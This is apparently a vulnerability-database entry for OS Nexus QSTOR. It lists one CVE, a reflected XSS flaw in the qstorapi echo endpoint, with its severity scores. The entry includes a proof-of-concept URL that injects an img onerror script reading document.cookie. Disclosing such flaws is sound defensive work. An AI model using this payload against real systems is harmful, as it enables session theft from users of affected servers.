VYPR

QSTOR

by OS Nexus

CVEs (1)

  • CVE-2021-42080HigJul 10, 2023
    risk 0.48cvss 7.4epss 0.01

    An attacker is able to launch a Reflected XSS attack using a crafted URL. POC: Visit the following URL https://:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)>